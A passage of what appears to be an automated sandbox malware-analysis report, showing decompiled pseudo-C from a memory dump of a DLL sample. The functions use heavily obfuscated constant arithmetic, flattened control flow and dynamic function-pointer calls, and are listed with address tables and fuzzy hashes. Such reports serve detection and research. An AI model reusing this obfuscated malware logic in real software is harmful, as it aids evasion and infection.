				_v64 = 0x38c801;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0xc825be84;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 ^ 0x000d1c3b;
				_v72 = 0xe77e6e;
				_v72 = _v72 + 0xffffb3b2;
				_v72 = _v72 << 0xd;
				_t168 = 0x78;
				_v72 = _v72 / _t168;
				_v72 = _v72 ^ 0x01e31a81;
				_v40 = 0x7e766a;
				_v40 = _v40 * 0x26;
				_v40 = _v40 ^ 0x12c7afcd;
				_v52 = 0xe103b8;
				_t169 = 0x4e;
				_v52 = _v52 / _t169;
				_v52 = _v52 + 0xffff4b52;
				_v52 = _v52 ^ 0x000d8548;
				do {
					while(_t147 != 0x8d72c38) {
						if(_t147 == 0xc75b0cb) {
							_t143 = E008657B8( *_t164, _v76, _v80,  *((intOrPtr*)(_t164 + 4)), _v44,  &_v32, _v48);
							_t172 =  &(_t172[6]);
							if(_t143 != 0) {
								_t147 = 0x8d72c38;
								continue;
							}
						} else {
							if(_t147 != 0xeb10c15) {
								goto L8;
							} else {
								_t147 = 0xc75b0cb;
								continue;
							}
						}
						goto L9;
					}
					_t159 =  *0x886224; // 0x0
					E00884D53( *((intOrPtr*)(_t145 + 4)),  *((intOrPtr*)(_t159 + 0x48)), _v36, _t147,  &_v32, _v60, _v64, _v68, _v72, _v40, _t147,  *_t145, _v52);
					_t172 =  &(_t172[0xb]);
					_t147 = 0x3b36d39;
					_t165 =  ==  ? 1 : _t165;
					L8:
				} while (_t147 != 0x3b36d39);
				L9:
				return _t165;
			}

0x008807ae
0x008807b5
0x008807b9
0x008807ba
0x008807be
0x008807bf
0x008807c1
0x008807c6
0x008807ce
0x008807d7
0x008807d9
0x008807de
0x008807e0
0x008807e5
0x008807eb
0x008807f3
0x008807f8
0x00880800
0x00880808
0x00880810
0x00880815
0x0088081d
0x00880825
0x0088082d
0x00880835
0x0088083a
0x00880842
0x0088084a
0x00880852
0x00880857
0x0088085f
0x00880867
0x0088086f
0x00880877
0x0088087c
0x00880884
0x0088088c
0x00880894
0x0088089c
0x008808a9
0x008808ac
0x008808b0
0x008808b8
0x008808c0
0x008808d0
0x008808d4
0x008808dc
0x008808e4
0x008808ec
0x008808f1
0x008808f9
0x008808fe
0x00880906
0x0088090e
0x00880916
0x0088091f
0x00880922
0x00880926
0x0088092e
0x0088093b
0x0088093f
0x00880947
0x00880957
0x0088095f
0x00880963
0x0088096b
0x00880973
0x00880973
0x0088097d
0x008809a8
0x008809ad
0x008809b2
0x008809b4
0x00000000
0x008809b4
0x0088097f
0x00880985
0x00000000
0x00880987
0x00880987
0x00000000
0x00880987
0x00880985
0x00000000
0x0088097d
0x008809dd
0x008809e9
0x008809f7
0x008809fc
0x00880a01
0x00880a04
0x00880a04
0x00880a11
0x00880a19

Strings

5b, xrefs: 008808B8
jv~, xrefs: 0088092E
n~, xrefs: 00880906

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5b$jv~$n~
API String ID: 0-1119068381
Opcode ID: c4bdf836f312235c58f70c116efcf662de60f07055fbbec36b835e3ea9125143
Instruction ID: de5445eb4689ad363b4f18297c2543527ad57cfb3c5ef1f8c19ea49a86616d90
Opcode Fuzzy Hash: c4bdf836f312235c58f70c116efcf662de60f07055fbbec36b835e3ea9125143
Instruction Fuzzy Hash: A05144724083059FC748DF25C98981FBBE1FBC8758F509A1DF196A6221D371CA8ACF46

Uniqueness

Uniqueness Score: -1.00%

Function 00877A0F, Relevance: 3.9, Strings: 3, Instructions: 137
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00877A0F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v76;
				char _v596;
				void* _t147;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t147);
				_v72 = _v72 & 0x00000000;
				_v68 = _v68 & 0x00000000;
				_v76 = 0xac6bc1;
				_v48 = 0x918367;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x000cf094;
				_v36 = 0xe92c2d;
				_v36 = _v36 ^ 0xfac2eab7;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0xe346c7b1;
				_v64 = 0xc08572;
				_t170 = 0x1e;
				_v64 = _v64 / _t170;
				_v64 = _v64 ^ 0x00015c03;
				_v12 = 0x9212d2;
				_t171 = 0x1d;
				_v12 = _v12 * 0x39;
				_v12 = _v12 + 0x3383;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x08263998;
				_v32 = 0xc20336;
				_v32 = _v32 * 0x70;
				_v32 = _v32 ^ 0x74671eb1;
				_v32 = _v32 ^ 0x2084f54c;
				_v40 = 0xa9787c;
				_v40 = _v40 ^ 0x381c5a49;
				_v40 = _v40 | 0x64fc5a0b;
				_v40 = _v40 ^ 0x7cf9cebd;
				_v20 = 0x646c84;
				_v20 = _v20 * 0xa;
				_v20 = _v20 ^ 0x10bf9a9f;
				_v20 = _v20 ^ 0x793d42f9;
				_v20 = _v20 ^ 0x6a6515eb;
				_v60 = 0xc09cf0;
				_v60 = _v60 << 9;
				_v60 = _v60 ^ 0x813cbcc6;
				_v8 = 0xc99b6c;
				_v8 = _v8 * 0x26;
				_v8 = _v8 + 0xffff7686;
				_v8 = _v8 ^ 0x08dcc16a;
				_v8 = _v8 ^ 0x1531615b;
				_v44 = 0x17c218;
				_v44 = _v44 | 0xd7791395;
				_v44 = _v44 + 0xde66;
				_v44 = _v44 ^ 0xd7809290;
				_v28 = 0x8f3b5f;
				_v28 = _v28 >> 0xb;
				_v28 = _v28 * 0x5e;
				_v28 = _v28 ^ 0x00039abd;
				_v56 = 0xe3e33c;
				_v56 = _v56 * 0x69;
				_v56 = _v56 ^ 0x5d7c15ff;
				_v52 = 0x7e8124;
				_v52 = _v52 + 0xc0d9;
				_v52 = _v52 ^ 0x007e7944;
				_v24 = 0x2edb0b;
				_v24 = _v24 / _t171;
				_t172 = 0x3a;
				_v24 = _v24 / _t172;
				_t173 = 0x6f;
				_v24 = _v24 / _t173;
				_v24 = _v24 ^ 0x00044e1b;
				_v16 = 0xd6e45b;
				_v16 = _v16 * 0x6a;
				_v16 = _v16 | 0xc518fde9;
				_v16 = _v16 + 0xffff1d23;
				_v16 = _v16 ^ 0xddf5a256;
				_push(_v12);
				_push(_v64);
				_push(_v36);
				E00872C9C(_v40, _v16, E0087E1F8(0x86170c, _v48, _v16),  &_v596, 0x86170c, _v20, __edx);
				E0087FECB(_t164, _v60, _v8, _v44, _v28);
				return E0086D061( &_v596, _v56, _v52, _v24, _v16);
			}

0x00877a1a
0x00877a1f
0x00877a22
0x00877a25
0x00877a26
0x00877a27
0x00877a2c
0x00877a32
0x00877a36
0x00877a3d
0x00877a44
0x00877a48
0x00877a4f
0x00877a56
0x00877a5d
0x00877a61
0x00877a68
0x00877a74
0x00877a79
0x00877a7e
0x00877a85
0x00877a90
0x00877a91
0x00877a94
0x00877a9b
0x00877a9f
0x00877aa6
0x00877ab1
0x00877ab4
0x00877abb
0x00877ac2
0x00877ac9
0x00877ad0
0x00877ad7
0x00877ade
0x00877ae9
0x00877aec
0x00877af3
0x00877afa
0x00877b01
0x00877b08
0x00877b0c
0x00877b13
0x00877b1e
0x00877b21
0x00877b28
0x00877b2f
0x00877b36
0x00877b3d
0x00877b44
0x00877b4b
0x00877b52
0x00877b59
0x00877b61
0x00877b64
0x00877b6b
0x00877b76
0x00877b79
0x00877b80
0x00877b87
0x00877b8e
0x00877b95
0x00877ba1
0x00877ba9
0x00877bb0
0x00877bb8
0x00877bc0
0x00877bc3
0x00877bca
0x00877bd5
0x00877bd8
0x00877bdf
0x00877be6
0x00877bed
0x00877bf0
0x00877bf3
0x00877c16
0x00877c29
0x00877c4d

Strings

Dy~, xrefs: 00877B8E
<, xrefs: 00877B6B
-,, xrefs: 00877A4F

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: -,$<$Dy~
API String ID: 0-1106285139
Opcode ID: 86d82d32c63642ddf21e2a59e8fb15fc8724f06648e00aacb7f342e47f4ff650
Instruction ID: e26aa055dee12fadd168bc08d698058227c88ec4a27da8bf37bed86e215b9c18
Opcode Fuzzy Hash: 86d82d32c63642ddf21e2a59e8fb15fc8724f06648e00aacb7f342e47f4ff650
Instruction Fuzzy Hash: C661EF71C0120DEBCF08CFE5D98A9DEBBB2FB48314F208159E111BA260D7B54A55CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00867442, Relevance: 3.9, Strings: 3, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00867442(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				void* _t68;
				intOrPtr _t81;
				signed int _t82;
				signed int _t87;
				signed int _t88;
				void* _t91;
				intOrPtr _t105;
				intOrPtr* _t106;
				void* _t107;
				signed int* _t111;

				_push(_a16);
				_t106 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0087FE29(_t68);
				_v24 = 0x62b98c;
				_t111 =  &(( &_v28)[6]);
				_t107 = 0;
				_t91 = 0x56d49db;
				_t87 = 0x32;
				_v24 = _v24 * 0x4b;
				_v24 = _v24 / _t87;
				_v24 = _v24 + 0xffff2f8c;
				_v24 = _v24 ^ 0x009a9eb5;
				_v16 = 0xcd53e2;
				_t88 = 0x3a;
				_v16 = _v16 * 0x65;
				_v16 = _v16 + 0xffffa8ae;
				_v16 = _v16 ^ 0x510428a2;
				_v28 = 0xd5f3ee;
				_v28 = _v28 ^ 0x77e73800;
				_v28 = _v28 / _t88;
				_v28 = _v28 >> 7;
				_v28 = _v28 ^ 0x0000e246;
				_v20 = 0x9cb423;
				_v20 = _v20 + 0x5dad;
				_v20 = _v20 ^ 0xe88d7dca;
				_v20 = _v20 ^ 0xe81c7203;
				_v4 = 0x5f6be5;
				_t46 =  &_v4; // 0x5f6be5
				_v4 =  *_t46 * 0x5c;
				_v4 = _v4 ^ 0x224497bb;
				_v8 = 0xac6149;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x0020023e;
				_v12 = 0x405ac1;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x000eeb29;
				do {
					while(_t91 != 0x56d49db) {
						if(_t91 == 0x845f35b) {
							_t82 = E00870F86(_t106);
							asm("sbb ecx, ecx");
							_t91 = ( ~_t82 & 0xfe625aa0) + 0xd9296b1;
							continue;
						} else {
							if(_t91 == 0xbb8a3c5) {
								E00870D04();
								_t91 = 0xd9296b1;
								continue;
							} else {
								if(_t91 == 0xbf4f151) {
									if(E00878FAE(_a4) != 0) {
										_t107 = 1;
									} else {
										_t91 = 0xbb8a3c5;
										continue;
									}
								} else {
									if(_t91 != 0xd9296b1) {
										goto L12;
									} else {
										_t105 =  *0x886224; // 0x0
										E00882B09(_v4, _t105, _v8, _v12);
									}
								}
							}
						}
						L15:
						return _t107;
					}
					_push(_t91);
					_push(_t91);
					_t81 = E0086C5D8(0x64);
					_t111 =  &(_t111[3]);
					 *0x886224 = _t81;
					_t91 = 0x845f35b;
					L12:
				} while (_t91 != 0xd85fda5);
				goto L15;
			}

0x00867449
0x0086744d
0x0086744f
0x00867453
0x00867457
0x0086745c
0x0086745d
0x00867462
0x0086746a
0x00867474
0x00867476
0x00867482
0x00867483
0x0086748f
0x00867495
0x0086749d
0x008674a5
0x008674b2
0x008674b3
0x008674b7
0x008674bf
0x008674c7
0x008674cf
0x008674e2
0x008674e6
0x008674eb
0x008674f3
0x008674fb
0x00867503
0x0086750b
0x00867513
0x0086751b
0x00867520
0x00867524
0x0086752c
0x00867534
0x00867539
0x00867541
0x00867549
0x0086754e
0x00867556
0x00867556
0x00867564
0x008675ad
0x008675b6
0x008675be
0x00000000
0x00867566
0x00867568
0x008675a2
0x008675a7
0x00000000
0x0086756a
0x00867570
0x0086759c
0x008675f8
0x0086759e
0x0086759e
0x00000000
0x0086759e
0x00867572
0x00867574
0x00000000
0x00867576
0x0086757e
0x00867588
0x0086758e
0x00867574
0x00867570
0x00867568
0x008675fa
0x00867602
0x00867602
0x008675d2
0x008675d3
0x008675d6
0x008675db
0x008675de
0x008675e3
0x008675e8
0x008675e8
0x00000000

Strings

F, xrefs: 008674EB
K3xq, xrefs: 00867446
k_, xrefs: 0086751B

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: F$K3xq$k_
API String ID: 0-3174058581
Opcode ID: d99e3b36fedbd9a167b031585e136c086d4efe3b6ca00e9e55b749a9f171e6e5
Instruction ID: 4b9cbdf6a15d983ec547e180e55cae87bcf0f2c6c5d1c259df53370449871b1b
Opcode Fuzzy Hash: d99e3b36fedbd9a167b031585e136c086d4efe3b6ca00e9e55b749a9f171e6e5
Instruction Fuzzy Hash: A241CD7160C3429FD718DF28D48982FBBE1FBC4758F104A1EF58696261E774CA088B87

Uniqueness

Uniqueness Score: -1.00%

Function 0087A2A5, Relevance: 3.9, Strings: 3, Instructions: 105
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E0087A2A5(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _t121;
				void* _t123;
				intOrPtr* _t124;
				signed int _t127;
				intOrPtr _t136;

				_v56 = _v56 & 0x00000000;
				_v68 = 0x56d43f;
				_v64 = 0xa378a6;
				_v60 = 0xa37ee;
				_v44 = 0x7acd08;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x000369a9;
				_v12 = 0x8bcc43;
				_v12 = _v12 << 6;
				_v12 = _v12 | 0x230a0204;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0xfb180412;
				_v8 = 0x75376c;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x2bde3cb3;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x15e166f0;
				_v36 = 0x2455a;
				_v36 = _v36 >> 2;
				_v36 = _v36 + 0xffff434e;
				_v36 = _v36 ^ 0xfff24d76;
				_v20 = 0x28ad7b;
				_v20 = _v20 << 6;
				_v20 = _v20 << 0x10;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x00010bf1;
				_v16 = 0xc11cd7;
				_v16 = _v16 >> 4;
				_v16 = _v16 >> 5;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x000c5122;
				_v48 = 0x6ce03d;
				_v48 = _v48 ^ 0x08e870e9;
				_v48 = _v48 ^ 0x08851ea6;
				_v40 = 0xece1ae;
				_v40 = _v40 | 0xa708c82b;
				_v40 = _v40 + 0xffff66a5;
				_v40 = _v40 ^ 0xa7eb2511;
				_v52 = 0x51901b;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x0285bcb2;
				_v32 = 0xe2234;
				_v32 = _v32 ^ 0x801b0981;
				_v32 = _v32 + 0xffff47d0;
				_v32 = _v32 + 0x1bdf;
				_v32 = _v32 ^ 0x8011a9a9;
				_v28 = 0xf9a2d;
				_v28 = _v28 + 0xffff0cd9;
				_t127 = 0x38;
				_t136 = _a4;
				_v28 = _v28 * 0x39;
				_v28 = _v28 + 0xf1da;
				_v28 = _v28 ^ 0x0344abfa;
				_v24 = 0x8a904b;
				_v24 = _v24 + 0x44ce;
				_v24 = _v24 / _t127;
				_v24 = _v24 << 0xc;
				_v24 = _v24 ^ 0x27a49ff9;
				_t121 =  *((intOrPtr*)(_t136 + 0x2c))( *((intOrPtr*)(_t136 + 0x38)), 1, 0);
				_t143 = _t121;
				if(_t121 != 0) {
					_push(_v36);
					_push(_v8);
					_push(0x8618ec);
					_t123 = E00874244(_v44, _v12, _t143);
					_push(_v40);
					_t138 = _t123;
					_push(_v48);
					_push(_t123);
					_push( *((intOrPtr*)(_t136 + 0x38)));
					_t124 = E00883560(_v20, _v16);
					if(_t124 != 0) {
						 *_t124();
					}
					E0087FECB(_t138, _v52, _v32, _v28, _v24);
				}
				return 0;
			}

0x0087a2ac
0x0087a2b2
0x0087a2b9
0x0087a2c0
0x0087a2c7
0x0087a2ce
0x0087a2d2
0x0087a2d9
0x0087a2e0
0x0087a2e4
0x0087a2eb
0x0087a2ef
0x0087a2f6
0x0087a2fd
0x0087a301
0x0087a308
0x0087a30b
0x0087a312
0x0087a319
0x0087a31d
0x0087a324
0x0087a32b
0x0087a332
0x0087a336
0x0087a33a
0x0087a33e
0x0087a345
0x0087a34c
0x0087a350
0x0087a354
0x0087a358
0x0087a35f
0x0087a366
0x0087a36d
0x0087a374
0x0087a37b
0x0087a382
0x0087a389
0x0087a390
0x0087a397
0x0087a39b
0x0087a3a2
0x0087a3a9
0x0087a3b0
0x0087a3b7
0x0087a3be
0x0087a3c5
0x0087a3cc
0x0087a3d9
0x0087a3da
0x0087a3dd
0x0087a3e0
0x0087a3e7
0x0087a3ee
0x0087a3f5
0x0087a403
0x0087a406
0x0087a40a
0x0087a416
0x0087a419
0x0087a41b
0x0087a41e
0x0087a421
0x0087a42a
0x0087a42f
0x0087a434
0x0087a437
0x0087a439
0x0087a442
0x0087a443
0x0087a446
0x0087a450
0x0087a452
0x0087a452
0x0087a462
0x0087a46a
0x0087a471

Strings

l7u, xrefs: 0087A2F6
=l, xrefs: 0087A35F
7, xrefs: 0087A2C0

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: =l$l7u$7
API String ID: 0-2380881030
Opcode ID: d0587b7f77f5575d36992000c14c3c5c73301adb762c2e7ada120aec7c649c58
Instruction ID: 31c7a6ccb40f1a71bde274fb7a5f773da2316fbb7242e8be24a691786b0d7927
Opcode Fuzzy Hash: d0587b7f77f5575d36992000c14c3c5c73301adb762c2e7ada120aec7c649c58
Instruction Fuzzy Hash: EA512171D0020AEBDF48CFE5D94A5EEBBB0FF44318F208158D512B2210D7B54A59CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0086BAA9, Relevance: 3.8, Strings: 3, Instructions: 89
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0086BAA9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* _t91;
				signed int _t109;
				signed int _t110;
				signed int _t119;
				signed int _t120;

				_t119 = _a12;
				_push(_t119);
				_push(_a8);
				_push(_a4);
				E0087FE29(_t91);
				_v36 = _v36 & 0x00000000;
				_v40 = 0x12a44;
				_v16 = 0x6d7ae4;
				_t109 = 9;
				_v16 = _v16 * 0x2c;
				_v16 = _v16 ^ 0x12d84a78;
				_v8 = 0x632f63;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x2f02a769;
				_v8 = _v8 + 0xffffcf5a;
				_v8 = _v8 ^ 0xb8bafcbb;
				_a12 = 0xb71f5c;
				_a12 = _a12 + 0x2974;
				_a12 = _a12 / _t109;
				_t110 = 0x4b;
				_a12 = _a12 * 0x6a;
				_a12 = _a12 ^ 0x0865fbc8;
				_v28 = 0x14d1df;
				_v28 = _v28 + 0x8244;
				_v28 = _v28 ^ 0x001f502f;
				_v24 = 0x8a40f8;
				_v24 = _v24 | 0x61e91a85;
				_v24 = _v24 ^ 0x61e69297;
				_v32 = 0x91ce11;
				_v32 = _v32 + 0xffffd148;
				_v32 = _v32 ^ 0x009b82ce;
				_v20 = 0xf1824f;
				_v20 = _v20 / _t110;
				_v20 = _v20 ^ 0x68027ae2;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x3404b933;
				E0086DC1B(_t110);
				_v16 = 0x8712a3;
				_v16 = _v16 + 0xf3d2;
				_v16 = _v16 + 0xffff1cdd;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x00004395;
				_v12 = 0x6a396b;
				_v12 = _v12 | 0x9b16e6b5;
				_v12 = _v12 << 0xd;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x006fffe0;
				_t120 = E0087CCA0(_v16, _v12);
				E0086E404(_v32, 1, _v20, _t120, _t119);
				 *((short*)(_t119 + _t120 * 2)) = 0;
				return 0;
			}

0x0086bab1
0x0086bab4
0x0086bab5
0x0086bab8
0x0086babd
0x0086bac2
0x0086bac8
0x0086bacf
0x0086badc
0x0086badf
0x0086bae2
0x0086bae9
0x0086baf0
0x0086baf4
0x0086bafb
0x0086bb02
0x0086bb09
0x0086bb10
0x0086bb1e
0x0086bb25
0x0086bb26
0x0086bb29
0x0086bb30
0x0086bb37
0x0086bb3e
0x0086bb45
0x0086bb4c
0x0086bb53
0x0086bb5a
0x0086bb61
0x0086bb68
0x0086bb6f
0x0086bb7b
0x0086bb7e
0x0086bb85
0x0086bb88
0x0086bb92
0x0086bb97
0x0086bba1
0x0086bba8
0x0086bbaf
0x0086bbb3
0x0086bbba
0x0086bbc1
0x0086bbc8
0x0086bbcc
0x0086bbd0
0x0086bbee
0x0086bbfb
0x0086bc05
0x0086bc0e

Strings

c/c, xrefs: 0086BAE9
k9j, xrefs: 0086BBBA
zm, xrefs: 0086BACF

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: c/c$k9j$zm
API String ID: 0-1793526708
Opcode ID: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
Instruction ID: cd699cbdb2a8ac3dadededdaa6971ccee30cc35e7354aaec64546f8664522b45
Opcode Fuzzy Hash: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
Instruction Fuzzy Hash: 96412372D0030AABCB04DFA5C84A5EEBBB2FF44314F108558E525A6260D7B49B54CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0087AD08, Relevance: 2.7, Strings: 2, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0087AD08() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t263;
				intOrPtr _t264;
				intOrPtr _t267;
				void* _t273;
				void* _t277;
				intOrPtr _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int* _t322;

				_t322 =  &_v1144;
				_v1052 = 0x3e8be7;
				_t310 = 0;
				_t277 = 0xe4a3d19;
				_v1048 = 0;
				_v1044 = 0;
				_v1100 = 0x8001b8;
				_t311 = 0x1c;
				_v1100 = _v1100 / _t311;
				_v1100 = _v1100 + 0x9b02;
				_v1100 = _v1100 ^ 0x0003825e;
				_v1104 = 0x6ba50e;
				_v1104 = _v1104 + 0x86a8;
				_v1104 = _v1104 << 0xa;
				_v1104 = _v1104 ^ 0xb0a58b81;
				_v1064 = 0xa5f60f;
				_v1064 = _v1064 ^ 0xf15b406a;
				_v1064 = _v1064 ^ 0xf1fbbabe;
				_v1116 = 0xfce2df;
				_v1116 = _v1116 ^ 0xb7cf3da1;
				_v1116 = _v1116 + 0x963f;
				_v1116 = _v1116 ^ 0x6f9af2b2;
				_v1116 = _v1116 ^ 0xd8ae206e;
				_v1132 = 0x6fbbde;
				_v1132 = _v1132 | 0xe49a2ecd;
				_v1132 = _v1132 + 0xd857;
				_v1132 = _v1132 + 0xffffaa9b;
				_v1132 = _v1132 ^ 0xe507ae81;
				_v1096 = 0xa4704d;
				_v1096 = _v1096 + 0x7787;
				_t312 = 0x67;
				_v1096 = _v1096 / _t312;
				_v1096 = _v1096 ^ 0x00025cd8;
				_v1084 = 0x38937;
				_t313 = 0x79;
				_v1084 = _v1084 * 0x4f;
				_v1084 = _v1084 ^ 0x5b1a1bbe;
				_v1084 = _v1084 ^ 0x5a043b4e;
				_v1136 = 0x1276ee;
				_v1136 = _v1136 + 0xffffa0e4;
				_v1136 = _v1136 + 0xffff74bb;
				_v1136 = _v1136 << 2;
				_v1136 = _v1136 ^ 0x0044c443;
				_v1068 = 0xe79065;
				_v1068 = _v1068 << 0xc;
				_v1068 = _v1068 + 0xcbe6;
				_v1068 = _v1068 ^ 0x7908daa4;
				_v1088 = 0x9a4bed;
				_v1088 = _v1088 + 0xfffff274;
				_v1088 = _v1088 + 0xb36d;
				_v1088 = _v1088 ^ 0x00951f6d;
				_v1144 = 0x62e226;
				_v1144 = _v1144 ^ 0x3dd3a3b2;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff6a42;
				_v1144 = _v1144 ^ 0x0008f37a;
				_v1108 = 0x394fd6;
				_v1108 = _v1108 * 0x13;
				_v1108 = _v1108 / _t313;
				_v1108 = _v1108 ^ 0x00080299;
				_v1120 = 0x93d07f;
				_v1120 = _v1120 << 0xa;
				_t314 = 5;
				_v1120 = _v1120 / _t314;
				_v1120 = _v1120 ^ 0x44bcf5d7;
				_v1120 = _v1120 ^ 0x4b68940f;
				_v1072 = 0xc1f636;
				_v1072 = _v1072 | 0x86bbf578;
				_t315 = 0x47;
				_v1072 = _v1072 * 0x24;
				_v1072 = _v1072 ^ 0xfb68157e;
				_v1080 = 0x3ac036;
				_v1080 = _v1080 + 0xffffbaa8;
				_v1080 = _v1080 ^ 0x136d94c6;
				_v1080 = _v1080 ^ 0x1353f0eb;
				_v1128 = 0xb3095e;
				_v1128 = _v1128 / _t315;
				_v1128 = _v1128 | 0xf7128eca;
				_v1128 = _v1128 >> 0xc;
				_v1128 = _v1128 ^ 0x0004e558;
				_v1076 = 0x73500f;
				_v1076 = _v1076 | 0x9d7bc413;
				_v1076 = _v1076 + 0xffff6f55;
				_v1076 = _v1076 ^ 0x9d72e045;
				_v1124 = 0xc98916;
				_v1124 = _v1124 + 0x2b72;
				_v1124 = _v1124 | 0x4777986b;
				_t316 = 0x69;
				_v1124 = _v1124 / _t316;
				_v1124 = _v1124 ^ 0x00ab5a68;
				_v1140 = 0xc8b3ea;
				_t317 = 0x7e;
				_v1140 = _v1140 / _t317;
				_v1140 = _v1140 | 0x89e2a6fa;
				_v1140 = _v1140 >> 4;
				_v1140 = _v1140 ^ 0x08902903;
				_v1092 = 0x846906;
				_v1092 = _v1092 | 0x1b02230c;
				_v1092 = _v1092 + 0xffff209e;
				_v1092 = _v1092 ^ 0x1b8bec31;
				_v1056 = 0xaf8c32;
				_t318 = 0x2e;
				_v1056 = _v1056 / _t318;
				_v1056 = _v1056 ^ 0x00017103;
				_v1060 = 0x7e9355;
				_v1060 = _v1060 >> 0x10;
				_v1060 = _v1060 ^ 0x0008a840;
				_v1112 = 0x76e6c0;
				_v1112 = _v1112 ^ 0x1858c3ee;
				_t319 = 0x68;
				_v1112 = _v1112 / _t319;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0x000255a3;
				do {
					while(_t277 != 0xc59040) {
						if(_t277 == 0x420aa66) {
